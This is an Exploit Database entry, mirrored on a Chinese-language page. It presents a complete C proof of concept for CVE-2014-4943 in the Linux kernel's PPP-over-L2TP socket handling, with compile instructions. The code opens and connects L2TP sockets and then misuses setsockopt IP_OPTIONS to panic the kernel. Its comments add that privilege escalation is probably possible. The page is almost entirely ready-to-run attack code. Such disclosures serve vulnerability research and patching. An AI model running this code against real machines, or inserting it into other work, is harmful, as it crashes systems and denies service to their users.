Linux Kernel 3.15.6 – PPP-over-L2TP Socket Level Handling Crash (PoC)

• Exploit Database
• 103 阅读

• 作者： Emeric Nasi
  日期： 2015-03-04
• 类别：

  • dos
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/36267/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162

  /* ---------------------------------------------------------------------------------------------------- * cve-2014-4943_poc.c * * The PPPoL2TP feature in net/l2tp/l2tp_ppp.c in the Linux kernel through 3.15.6 allows local users to gain privileges by leveraging data-structure * differences between an l2tp socket and an inet socket. * * This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic. * I have tried to exploit this vulnerability and I am sure there is a way (or several) to elevate privileges. * There are some kernel structures that can be overwriten but I didn&apos;t manage to find the ultimate trick to at least point back to userland. * If seems guys at immunuty found a way using race condition. * * * Compile with gcc -fno-stack-protector -Wall -o cve-2014-4943_poc cve-2014-4943_poc.c * * Emeric Nasi - www.sevagas.com *-----------------------------------------------------------------------------------------------------*/   /* ----------------------- Includes ----------------------------*/   #include <netinet/ip.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <sys/mman.h> #include <linux/net.h> #include <linux/udp.h> #include <linux/if.h> #include <linux/if_pppox.h> #include <linux/if_pppol2tp.h>     /* ----------------------- Definitions ----------------------------*/   #define TARGET_KERNEL_MIN "3.2.0" #define TARGET_KERNEL_MAX "3.15.6" #define EXPLOIT_NAME "cve-2014-4943"       /* ----------------------- functions ----------------------------*/     /** * It is possible to modify several parts of socket object using IP options frop UDP setsockopt * For this POC, IP_OPTIONS is the easiest way to panic kernel */ void modifyUDPvalues(int tunnel_fd) { /* Extract from kernel code which is vulnerable, here you can see that both udp_setsockopt and ip_setsockopt (on inet_sock) can be used to leverage vulnerability:   int udp_setsockopt(struct sock *sk, int level, int optname, char __user *optval, unsigned int optlen) { if (level == SOL_UDP||level == SOL_UDPLITE) return udp_lib_setsockopt(sk, level, optname, optval, optlen, udp_push_pending_frames); return ip_setsockopt(sk, level, optname, optval, optlen); } */   int ip_options = 0x1; if (setsockopt(tunnel_fd, SOL_IP,IP_OPTIONS, &ip_options, 20) == -1) { perror("setsockopt (IP_OPTIONS)"); } }     /** * DOS poc for cve_2014_4943 vulnerability */ int main() {   int tunnel_fd; int tunnel_fd2; int udp_fd;   printf("[cve_2014_4943]: Preparing to exploit.\n");   /* Create first L2TP socket */ tunnel_fd = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP); if (tunnel_fd < 0) { perror("socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP)"); return -1; } /* Create second L2TP socket */ tunnel_fd2 = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP); if (tunnel_fd2 < 0) { perror("socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP)"); return -1; } if ((udp_fd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) { perror("cannot create socket"); return -1; }   /* Connect LT2P socket */ struct sockaddr_pppol2tp sax;   memset(&sax, 0, sizeof(sax)); sax.sa_family = AF_PPPOX; sax.sa_protocol = PX_PROTO_OL2TP; sax.pppol2tp.fd = udp_fd; /* fd of tunnel UDP socket */ sax.pppol2tp.addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);// peer_addr->sin_addr.s_addr; sax.pppol2tp.addr.sin_port = htons(1337);//peer_addr->sin_port; sax.pppol2tp.addr.sin_family = AF_INET; sax.pppol2tp.s_tunnel = 8;//tunnel_id; sax.pppol2tp.s_session = 0; /* special case: mgmt socket */ sax.pppol2tp.d_tunnel = 0; sax.pppol2tp.d_session = 0; /* special case: mgmt socket */   if(connect(tunnel_fd, (struct sockaddr *)&sax, sizeof(sax) ) < 0 ) { perror("connect failed"); }   /* Connect LT2P socket */ struct sockaddr_pppol2tp sax2;   memset(&sax, 0, sizeof(sax2)); sax2.sa_family = AF_PPPOX; sax2.sa_protocol = PX_PROTO_OL2TP; sax2.pppol2tp.s_tunnel = 8;//tunnel_id; sax2.pppol2tp.s_session = 1; sax2.pppol2tp.d_tunnel = 0; sax2.pppol2tp.d_session = 1;   if(connect(tunnel_fd2, (struct sockaddr *)&sax2, sizeof(sax2) ) < 0 ) { perror("connect failed"); }     /* * Entering critical part */ printf("[cve_2014_4943]:Panic!\n");   //modifyUDPvalues(tunnel_fd); modifyUDPvalues(tunnel_fd2);     // close opened socket puts("\n [+] Closing sockets..."); close(tunnel_fd); close(tunnel_fd2);   exit(0); }